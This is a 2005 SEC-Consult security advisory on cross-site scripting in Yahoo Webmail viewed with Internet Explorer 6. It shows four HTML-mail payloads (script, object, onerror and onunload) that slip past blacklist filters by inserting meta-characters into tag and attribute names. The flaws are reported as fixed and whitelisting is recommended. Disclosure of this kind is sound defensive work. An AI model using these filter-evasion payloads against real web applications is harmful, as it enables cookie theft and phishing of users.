Yahoo/MSIE XSS

SEC-CONSULT Security Advisory < 20051021-0 >

===================================================================================

title: Yahoo/MSIE XSS

program: Yahoo Webmail in combination with MSIE 6.0

(maybe other browsers)

homepage: www.yahoo.com

found: 2005-04

by: SEC-Team / SEC-CONSULT / www.sec-consult.com

===================================================================================

 

Vulnerabilty overview:

---------------

 

Since april 2005 SEC-Consult has found 5+ serious vulnerabilities within Yahoo's webmail systems.

All of them have been fixed in the production environment. Nevertheless SEC-Consult believes that

input-validation thru blacklists can just be a temporary solution to problems like this. From our

point of view there are many other applications vulnerable to this special type of problem where

vulnerabilities of clients and servers can be combined.

 

Vulnerabilty details:

---------------

 

1) XSS / Cookie-Theft

 

Yahoos blacklists fail to detect script-tags in combination with special characters like NULL-Bytes and other META-Characters.

This leaves Webmail users using MSIE vulnerable to typical XSS / Relogin-trojan / Phishing attacks.

 

2) Some XSS Examples from our advisories

 

Excerpt from HTML-mails:

 

================================================================================================
SCRIPT-TAG:
---cut here---
<h1>hello</h1><s[META-Char]cript>alert("i have you now")</s[META-Char]cript></br>rrrrrrxxxxx<br>
---cut here---
================================================================================================
OBJECT-TAG:
---cut here---
<objec[META-Char]t classid="CLSID:D27CDB6E-AE6D-11cf-96B8-444553540000">
<param name="movie" value="http://[somewhere]/yahoo.swf"></obje[META-Char]ct>
---cut here---
================================================================================================
ONERROR-Attribute:
---cut here---
<img src="http://dontexist.info/x.jpg" one[META-Char]rror="alert('i have you now')">uargg</p>
---cut here---
================================================================================================
ONUNLOAD-Attribute:
---cut here---
</body><body onun[META-Char]load=alert('i have you now')><br></br><p>somewords</p></body></html>
---cut here---
================================================================================================

 

 

Recommended hotfixes for webmail-users

---------------

 

Do not use MS Internet-Explorer.

 

 

Recommended fixes

---------------

 

Do not use blacklists on tags and attributes. Whitelist special/meta-characters.

 

 

Vendor status:

---------------

Vulnerabilities have been fixed.

 

 

General remarks

---------------

We would like to apologize in advance for potential nonconformities and/or known issues.

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC-Team / www.sec-consult.com /